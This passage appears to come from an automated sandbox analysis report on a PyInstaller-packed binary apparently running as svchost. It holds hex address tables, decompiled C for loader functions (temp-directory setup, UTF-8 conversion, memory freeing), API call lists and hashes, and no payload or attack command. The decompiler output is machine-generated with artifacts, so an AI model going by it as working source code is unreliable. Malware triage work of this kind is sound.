                            0x00bd67bc
                            0x00000000
                            0x00bd675d
                            0x00bd675f
                            0x00bd675f
                            0x00bd6761
                            0x00bd6761
                            0x00bd6763
                            0x00bd6763
                            0x00bd6766
                            0x00bd6766
                            0x00bd6769
                            0x00bd676c
                            0x00bd676c
                            0x00bd6778
                            0x00bd677c
                            0x00bd6784
                            0x00bd678a
                            0x00bd678f
                            0x00bd6792
                            0x00bd6796
                            0x00000000
                            0x00bd6798
                            0x00bd67a0
                            0x00bd67a5
                            0x00bd67a8
                            0x00bd67aa
                            0x00bd67ca
                            0x00bd67cc
                            0x00bd67cd
                            0x00bd67ce
                            0x00bd67cf
                            0x00bd67d0
                            0x00bd67d1
                            0x00bd67d6
                            0x00bd67d9
                            0x00bd67dc
                            0x00bd67dd
                            0x00bd67de
                            0x00bd67df
                            0x00bd67e5
                            0x00bd67e7
                            0x00bd67ea
                            0x00bd6816
                            0x00bd6816
                            0x00bd6816
                            0x00bd681b
                            0x00bd67ec
                            0x00bd67ec
                            0x00bd67ef
                            0x00bd67f5
                            0x00bd67fa
                            0x00bd67fd
                            0x00bd67ff
                            0x00000000
                            0x00bd6801
                            0x00bd6803
                            0x00bd6806
                            0x00bd6808
                            0x00bd6824
                            0x00bd6826
                            0x00bd680a
                            0x00bd680a
                            0x00bd680c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd680c
                            0x00bd6808
                            0x00000000
                            0x00bd680e
                            0x00bd680e
                            0x00bd6811
                            0x00bd6811
                            0x00000000
                            0x00bd67ef
                            0x00bd681d
                            0x00bd6823
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd67aa
                            0x00000000
                            0x00bd67ac
                            0x00bd67ac
                            0x00bd67af
                            0x00bd67af
                            0x00bd67b3
                            0x00bd67b3
                            0x00000000
                            0x00bd67b3
                            0x00bd675b
                            0x00bd6728
                            0x00bd6728
                            0x00bd67c0
                            0x00bd67c4
                            0x00bd67c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd66ed
                            0x00000000
                            0x00bd66ef
                            0x00bd66ef
                            0x00bd66f2
                            0x00bd66f2
                            0x00000000
                            0x00bd66f6
                            0x00bd66a5
                            0x00bd6676
                            0x00bd6676
                            0x00bd6702
                            0x00bd6706
                            0x00bd6706
                            0x00bd6620
                            0x00bd6624
                            0x00bd6627
                            0x00bd6631
                            0x00bd6639
                            0x00bd663f
                            0x00bd6641
                            0x00bd6643
                            0x00bd6648
                            0x00bd6648
                            0x00bd664b
                            0x00bd664b
                            0x00000000
                            0x00bd6641
                            0x00bd661e
                            0x00bd660a
                            0x00bd65dc
                            0x00bd653d
                            0x00bd6498
                            0x00bd6498
                            0x00bd649d
                            0x00bd64a0
                            0x00bd64cd
                            0x00bd64cd
                            0x00bd64cf
                            0x00000000
                            0x00bd64d1
                            0x00bd64d1
                            0x00bd64d3
                            0x00bd64fe
                            0x00bd6508
                            0x00bd650d
                            0x00bd6512
                            0x00000000
                            0x00bd64d5
                            0x00bd64df
                            0x00bd64e4
                            0x00bd64e9
                            0x00bd64ec
                            0x00bd64f2
                            0x00000000
                            0x00bd64f4
                            0x00bd64f4
                            0x00bd64fa
                            0x00bd64fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd64fc
                            0x00bd64f2
                            0x00bd64d3
                            0x00bd64a2
                            0x00bd64a2
                            0x00bd64a4
                            0x00000000
                            0x00bd64a6
                            0x00bd64a6
                            0x00bd64ab
                            0x00bd64ad
                            0x00bd6515
                            0x00bd6515
                            0x00bd651b
                            0x00bd651d
                            0x00bd64ba
                            0x00bd64ba
                            0x00bd64ba
                            0x00bd64bd
                            0x00bd64be
                            0x00bd64c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd64ad
                            0x00bd64a4
                            0x00bd64a0
                            0x00bd6492
                            0x00bd6462
                            0x00bd643b
                            0x00bd643b
                            0x00bd6440
                            0x00bd6446
                            0x00bd64c8
                            0x00bd64cc
                            0x00bd64cc
                            0x00bd63e0
                            0x00bd63e9
                            0x00bd63f1
                            0x00bd63f5
                            0x00bd63fc
                            0x00bd6402
                            0x00bd6404
                            0x00bd6406
                            0x00bd640b
                            0x00bd640b
                            0x00bd640e
                            0x00bd640e
                            0x00000000
                            0x00bd6404
                            0x00bd63de
                            0x00bd63cb
                            0x00bd63a3
                            0x00bd6304
                            0x00bd625d
                            0x00bd625d
                            0x00bd6260
                            0x00bd6291
                            0x00bd6291
                            0x00bd6293
                            0x00bd62a3
                            0x00bd62a8
                            0x00bd62ad
                            0x00bd62b3
                            0x00bd62b6
                            0x00bd62b8
                            0x00000000
                            0x00bd62ba
                            0x00bd62ba
                            0x00bd62c0
                            0x00000000
                            0x00bd62c2
                            0x00bd62cc
                            0x00bd62d1
                            0x00bd62d6
                            0x00bd62d9
                            0x00bd62df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd62df
                            0x00bd62c0
                            0x00bd6295
                            0x00bd6295
                            0x00000000
                            0x00bd6295
                            0x00bd6262
                            0x00bd6262
                            0x00bd6268
                            0x00000000
                            0x00bd626a
                            0x00bd626a
                            0x00bd626f
                            0x00bd6271
                            0x00bd62e1
                            0x00bd62e1
                            0x00bd62e7
                            0x00bd62e7
                            0x00bd62e9
                            0x00bd627e
                            0x00bd627e
                            0x00bd627e
                            0x00bd6281
                            0x00bd6282
                            0x00bd6289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd6271
                            0x00bd6268
                            0x00bd6260
                            0x00bd6257
                            0x00bd6227
                            0x00bd6200
                            0x00bd6200
                            0x00bd6205
                            0x00bd620b
                            0x00bd628c
                            0x00bd6290
                            0x00bd6290
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID:
                            • API String ID: 2719235668-0
                            • Opcode ID: 684d4712a0003c4634d648fd8c286fd9be34c1f67651816c03398425eac9243e
                            • Instruction ID: 2903112c3061f06805aaae68fc4ca95fd02b341958f3b99abc98ec98a349ace8
                            • Opcode Fuzzy Hash: 684d4712a0003c4634d648fd8c286fd9be34c1f67651816c03398425eac9243e
                            • Instruction Fuzzy Hash: 7BD1E371900204ABDB25AF789892B6EFBE4EF11324F1441EFE94597382FB369D01CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			E00BC4740(void* __edx, char* _a4) {
                            				short* _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				int _t18;
                            				short* _t23;
                            				void* _t24;
                            				void* _t25;
                            				char* _t26;
                            				struct HINSTANCE__* _t27;
                            				int _t28;
                            				intOrPtr* _t30;
                            				intOrPtr* _t32;
                            
                            				_t25 = __edx;
                            				_t33 =  &_v32;
                            				_t26 = _a4;
                            				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
                            				_t36 = _t28;
                            				if(_t28 != 0) {
                            					_t2 = _t28 + 1; // 0x1
                            					_push(2);
                            					_t23 = E00BC97F8(_t24);
                            					_t33 =  &_v32 + 8;
                            					__eflags = _t23;
                            					if(__eflags != 0) {
                            						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
                            						if(__eflags == 0) {
                            							_push("Failed to decode wchar_t from UTF-8\n");
                            							goto L6;
                            						}
                            					} else {
                            						_push("Out of memory.");
                            						_push("win32_utils_from_utf8");
                            						goto L7;
                            					}
                            				} else {
                            					_push("Failed to get wchar_t buffer size.\n");
                            					L6:
                            					_push("MultiByteToWideChar");
                            					L7:
                            					E00BC1860(_t25, _t36);
                            					_t33 = _t33 + 8;
                            					_t23 = 0;
                            				}
                            				_t27 = LoadLibraryA("kernel32");
                            				_t32 = GetProcAddress(_t27, "CreateActCtxW");
                            				_t30 = GetProcAddress(_t27, "ActivateActCtx");
                            				if(_t32 == 0 || _t30 == 0) {
                            					L14:
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					asm("xorps xmm0, xmm0");
                            					asm("movups [esp+0x10], xmm0");
                            					asm("movups [esp+0x24], xmm0");
                            					_v32 = 0x20;
                            					_v24 = _t23;
                            					_v28 = 0x10;
                            					 *0xbec000 =  *_t32( &_v32);
                            					L00BC9803(_t23);
                            					_t18 =  *0xbec000; // 0xffffffff
                            					if(_t18 == 0xffffffff) {
                            						L13:
                            						_push(0);
                            						 *0xbec000 = 0xffffffff;
                            						E00BC4860(_t25);
                            						goto L14;
                            					} else {
                            						_push(0xbf4a50);
                            						_push(_t18);
                            						if( *_t30() == 0) {
                            							goto L13;
                            						} else {
                            							return 1;
                            						}
                            					}
                            				}
                            			}
















                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00BC475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,00BC21A8,?,?,?,?,00BC2639,00000000), ref: 00BC47B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 00BC47CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00BC47D7
                              • Part of subcall function 00BC4860: GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 2f4b081eb6467e976dee90f958c2472009677db9a21a02f9e851676beee59252
                            • Instruction ID: f7f50e617d7f24e839794dcf04d4e5d0751c063fddcbe0b0f513258cc9213e70
                            • Opcode Fuzzy Hash: 2f4b081eb6467e976dee90f958c2472009677db9a21a02f9e851676beee59252
                            • Instruction Fuzzy Hash: 2421C131A4434967E3206BAA5C92F5776C8DF41B34F1006BEF920A71D1EBF0DE4542A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD81FB(intOrPtr _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _t25;
                            				intOrPtr* _t26;
                            				intOrPtr _t28;
                            				intOrPtr* _t29;
                            				intOrPtr* _t31;
                            				intOrPtr* _t45;
                            				intOrPtr* _t46;
                            				intOrPtr* _t47;
                            				intOrPtr* _t55;
                            				intOrPtr* _t70;
                            				intOrPtr _t74;
                            
                            				_t74 = _a4;
                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                            				if(_t25 != 0 && _t25 != 0xbec838) {
                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                            					if(_t45 != 0 &&  *_t45 == 0) {
                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                            						if(_t46 != 0 &&  *_t46 == 0) {
                            							E00BD09EB(_t46);
                            							E00BD7D80( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                            						if(_t47 != 0 &&  *_t47 == 0) {
                            							E00BD09EB(_t47);
                            							E00BD7E7E( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						E00BD09EB( *((intOrPtr*)(_t74 + 0x7c)));
                            						E00BD09EB( *((intOrPtr*)(_t74 + 0x88)));
                            					}
                            				}
                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                            				if(_t26 != 0 &&  *_t26 == 0) {
                            					E00BD09EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                            					E00BD09EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                            					E00BD09EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                            					E00BD09EB( *((intOrPtr*)(_t74 + 0x8c)));
                            				}
                            				E00BD836E( *((intOrPtr*)(_t74 + 0x9c)));
                            				_t28 = 6;
                            				_t55 = _t74 + 0xa0;
                            				_v8 = _t28;
                            				_t70 = _t74 + 0x28;
                            				do {
                            					if( *((intOrPtr*)(_t70 - 8)) != 0xbec300) {
                            						_t31 =  *_t70;
                            						if(_t31 != 0 &&  *_t31 == 0) {
                            							E00BD09EB(_t31);
                            							E00BD09EB( *_t55);
                            						}
                            						_t28 = _v8;
                            					}
                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                            						if(_t29 != 0 &&  *_t29 == 0) {
                            							E00BD09EB(_t29);
                            						}
                            						_t28 = _v8;
                            					}
                            					_t55 = _t55 + 4;
                            					_t70 = _t70 + 0x10;
                            					_t28 = _t28 - 1;
                            					_v8 = _t28;
                            				} while (_t28 != 0);
                            				return E00BD09EB(_t74);
                            			}

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 00BD823F
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7D9D
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DAF
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DC1
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DD3
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DE5
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7DF7
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E09
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E1B
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E2D
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E3F
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E51
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E63
                              • Part of subcall function 00BD7D80: _free.LIBCMT ref: 00BD7E75
                            • _free.LIBCMT ref: 00BD8234
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD8256
                            • _free.LIBCMT ref: 00BD826B
                            • _free.LIBCMT ref: 00BD8276
                            • _free.LIBCMT ref: 00BD8298
                            • _free.LIBCMT ref: 00BD82AB
                            • _free.LIBCMT ref: 00BD82B9
                            • _free.LIBCMT ref: 00BD82C4
                            • _free.LIBCMT ref: 00BD82FC
                            • _free.LIBCMT ref: 00BD8303
                            • _free.LIBCMT ref: 00BD8320
                            • _free.LIBCMT ref: 00BD8338
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 704cc8030f74d67a847f607f9e3f4fa5301ae54362fc77ed6feaf1992b1ded1c
                            • Instruction ID: f75a9bd5f9dc91ea1eb81194365797b9e55122b06226fe0dafa3bb2252ff3465
                            • Opcode Fuzzy Hash: 704cc8030f74d67a847f607f9e3f4fa5301ae54362fc77ed6feaf1992b1ded1c
                            • Instruction Fuzzy Hash: B93138716006019FEB21AA6AD846B5BF3E9EF10B11F1049ABF459D7252EF34AC40CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID:
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 0-2368408649
                            • Opcode ID: f9ef3641f2492287772c3926582e1b563e671e0ed8577cc20ddcfc77ad9ed5d8
                            • Instruction ID: 629c48bde79b9bf758f21a8e5eaa54c42d9692f4bdd0c63d363066ad1ecc50c6
                            • Opcode Fuzzy Hash: f9ef3641f2492287772c3926582e1b563e671e0ed8577cc20ddcfc77ad9ed5d8
                            • Instruction Fuzzy Hash: 61416EB59042806FD710A739EC86F5B7BD8FF84321F0406A9F809D6193EFB9D58586A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Similarity
                            • API ID: htonl
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 2009864989-3336796446
                            • Opcode ID: 643d292588b071c332a98eefd0028075efc16ad7240dcd1b0f7dceea256be3b7
                            • Instruction ID: d2e59c78d3e2a6452f53d8c29e55124e93e8d169c30e3e4b30def1231b14db3f
                            • Opcode Fuzzy Hash: 643d292588b071c332a98eefd0028075efc16ad7240dcd1b0f7dceea256be3b7
                            • Instruction Fuzzy Hash: 183157765002406FCB102B79AC8AE6B7FECEA817117448999F807E7153EF31EA1186A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD4331(char _a4) {
                            				char _v8;
                            
                            				_t26 = _a4;
                            				_t52 =  *_a4;
                            				if( *_a4 != 0xbe5190) {
                            					E00BD09EB(_t52);
                            					_t26 = _a4;
                            				}
                            				E00BD09EB( *((intOrPtr*)(_t26 + 0x3c)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x30)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x34)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x38)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x28)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x2c)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x40)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x44)));
                            				E00BD09EB( *((intOrPtr*)(_a4 + 0x360)));
                            				_v8 =  &_a4;
                            				E00BD41F7(5,  &_v8);
                            				_v8 =  &_a4;
                            				return E00BD4247(4,  &_v8);
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BD4345
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD4351
                            • _free.LIBCMT ref: 00BD435C
                            • _free.LIBCMT ref: 00BD4367
                            • _free.LIBCMT ref: 00BD4372
                            • _free.LIBCMT ref: 00BD437D
                            • _free.LIBCMT ref: 00BD4388
                            • _free.LIBCMT ref: 00BD4393
                            • _free.LIBCMT ref: 00BD439E
                            • _free.LIBCMT ref: 00BD43AC
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d22e4b2c01271c4b22aaab72fafc2a9271ccd48c8feecd5a409c4080daf9414b
                            • Instruction ID: 567ba23588019600bcb48eed4f8a32dc1ad86ab53e70a2a243219e8ce6c747f0
                            • Opcode Fuzzy Hash: d22e4b2c01271c4b22aaab72fafc2a9271ccd48c8feecd5a409c4080daf9414b
                            • Instruction Fuzzy Hash: 091107B6111008AFDB01FF59C892EDE7BA5EF15350F0040A2F9494B222E631DE51DB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E00BC3C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
                            				intOrPtr _v0;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t13;
                            				intOrPtr _t24;
                            				void* _t27;
                            				WCHAR* _t28;
                            				WCHAR* _t37;
                            				intOrPtr _t45;
                            				void* _t47;
                            				void* _t50;
                            				intOrPtr _t51;
                            				void* _t53;
                            				void* _t57;
                            				intOrPtr _t64;
                            				intOrPtr _t72;
                            				signed int _t74;
                            				void* _t75;
                            				void* _t76;
                            				void* _t77;
                            
                            				E00BC7880();
                            				_t13 =  *0xbec008; // 0xdc55bb75
                            				_a8228 = _t13 ^ _t74;
                            				_push(_t50);
                            				_t72 = _a8240;
                            				_v0 = _a8236;
                            				_push(_t57);
                            				if(_t72 == 0) {
                            					_t51 = _v0;
                            					L6:
                            					GetTempPathW(0x1000,  &_a36);
                            					E00BC4710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
                            					_t75 = _t74 + 0x10;
                            					_t64 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						_t58 = E00BCF329( &_a36,  &_a4);
                            						_t24 = E00BC4B30();
                            						_t76 = _t75 + 0xc;
                            						__eflags = _t24;
                            						if(_t24 == 0) {
                            							break;
                            						}
                            						L00BC9803(_t58);
                            						_t64 = _t64 + 1;
                            						_t75 = _t76 + 4;
                            						__eflags = _t64 - 5;
                            						if(_t64 < 5) {
                            							continue;
                            						}
                            						__eflags = _t72;
                            						if(_t72 == 0) {
                            							L4:
                            							_t27 = 0;
                            							L18:
                            							E00BC786A();
                            							return _t27;
                            						}
                            						_t37 = E00BC4BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t68 = _t37;
                            							SetEnvironmentVariableW(_t37, 0);
                            							L00BC9803(_t68);
                            							_t77 = _t75 + 0x10;
                            							_t27 = 0;
                            						} else {
                            							_t61 = _t37;
                            							_t69 = E00BC4BF0(0, _t51, 0);
                            							E00BCE1FC(_t37, _t40);
                            							L00BC9803(_t61);
                            							L00BC9803(_t69);
                            							L00BC9803(_t51);
                            							_t77 = _t75 + 0x2c;
                            							_t27 = 0;
                            						}
                            						goto L18;
                            					}
                            					E00BC4C90(_v0, _t58, 0x1000);
                            					L00BC9803(_t58);
                            					_t77 = _t76 + 0x10;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						_t28 = E00BC4BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t66 = _t28;
                            							SetEnvironmentVariableW(_t28, 0);
                            							L00BC9803(_t66);
                            							_t77 = _t77 + 0x10;
                            						} else {
                            							_t60 = _t28;
                            							_t67 = E00BC4BF0(0, _t51, 0);
                            							E00BCE1FC(_t28, _t31);
                            							L00BC9803(_t60);
                            							L00BC9803(_t67);
                            							L00BC9803(_t51);
                            							_t77 = _t77 + 0x2c;
                            						}
                            					}
                            					_t27 = 1;
                            					goto L18;
                            				}
                            				_push("TMP");
                            				_t45 = E00BC3E40(_t50, _t57);
                            				_push(_t72);
                            				_t51 = _t45;
                            				_t62 = E00BC3980();
                            				_t77 = _t74 + 8;
                            				if(_t46 == 0) {
                            					goto L4;
                            				}
                            				_t47 = E00BCE1FC(L"TMP", _t62);
                            				L00BC9803(_t62);
                            				_t74 = _t77 + 0xc;
                            				_t83 = _t47;
                            				if(_t47 == 0) {
                            					goto L6;
                            				} else {
                            					_push("LOADER: Failed to set the TMP environment variable.\n");
                            					E00BC1910(_t83);
                            					_t77 = _t74 + 4;
                            					goto L4;
                            				}
                            			}

                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,00BC3C46,?,00000000,?,pyi-runtime-tmpdir), ref: 00BC3CF9
                            • GetCurrentProcessId.KERNEL32 ref: 00BC3CFF
                              • Part of subcall function 00BC3E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,00BC24FE,_MEIPASS2), ref: 00BC3E76
                              • Part of subcall function 00BC3E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,00BC24FE,_MEIPASS2), ref: 00BC3E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC3D9C
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,00BC210F,?,?), ref: 00BC3E11
                            Strings
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: d31de34840c7bf0c73eb1ca2ee161ab55d295d9e98128c784bb63d20e8fb3b41
                            • Instruction ID: fd155ac0a6d051175b1ed4d0e1742bc886125856642fe7726fe8dbba79917ad3
                            • Opcode Fuzzy Hash: d31de34840c7bf0c73eb1ca2ee161ab55d295d9e98128c784bb63d20e8fb3b41
                            • Instruction Fuzzy Hash: F441D3B2A0034176F22176B45C8BF6F71E8DF46F81F5404AEFA05A7183EEA59E0542A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E00BC3980(short _a8192, signed int _a16384, intOrPtr _a16392) {
                            				short _v0;
                            				void* __edi;
                            				signed int _t14;
                            				signed int _t19;
                            				void* _t43;
                            				WCHAR* _t57;
                            				signed int _t58;
                            				WCHAR* _t65;
                            				signed int _t69;
                            				void* _t70;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t73;
                            
                            				E00BC7880();
                            				_t14 =  *0xbec008; // 0xdc55bb75
                            				_a16384 = _t14 ^ _t69;
                            				_t57 = E00BC4BF0(0, _a16392, 0);
                            				_t70 = _t69 + 0xc;
                            				_t82 = _t57;
                            				if(_t57 != 0) {
                            					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
                            					L00BC9803(_t57);
                            					_t71 = _t70 + 4;
                            					__eflags = _t19;
                            					if(__eflags != 0) {
                            						_t65 = E00BCD518(0,  &_a8192, 0x1000);
                            						_t72 = _t71 + 0xc;
                            						__eflags = _t65;
                            						if(__eflags != 0) {
                            							E00BC8520(_t57,  &_v0, 0, 0x2000);
                            							_push(0x5c);
                            							_push(_t65);
                            							_t58 = E00BC88E7(_t43);
                            							_t73 = _t72 + 0x14;
                            							__eflags = _t58;
                            							while(_t58 != 0) {
                            								E00BCDC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
                            								CreateDirectoryW( &_v0, 0);
                            								_t11 = _t58 + 2; // 0x2
                            								_push(0x5c);
                            								_t58 = E00BC88E7((_t58 - _t65 >> 1) + 1);
                            								_t73 = _t73 + 0x14;
                            								__eflags = _t58;
                            							}
                            							CreateDirectoryW(_t65, 0);
                            							__eflags = _a16384 ^ _t73;
                            							E00BC786A();
                            							return _t65;
                            						} else {
                            							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
                            							E00BC1910(__eflags);
                            							__eflags = _a16384 ^ _t72 + 0x00000004;
                            							E00BC786A();
                            							return 0;
                            						}
                            					} else {
                            						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
                            						E00BC1910(__eflags);
                            						__eflags = _a16384 ^ _t71 + 0x00000004;
                            						E00BC786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
                            					E00BC1910(_t82);
                            					E00BC786A();
                            					return 0;
                            				}
                            			}

















                            APIs
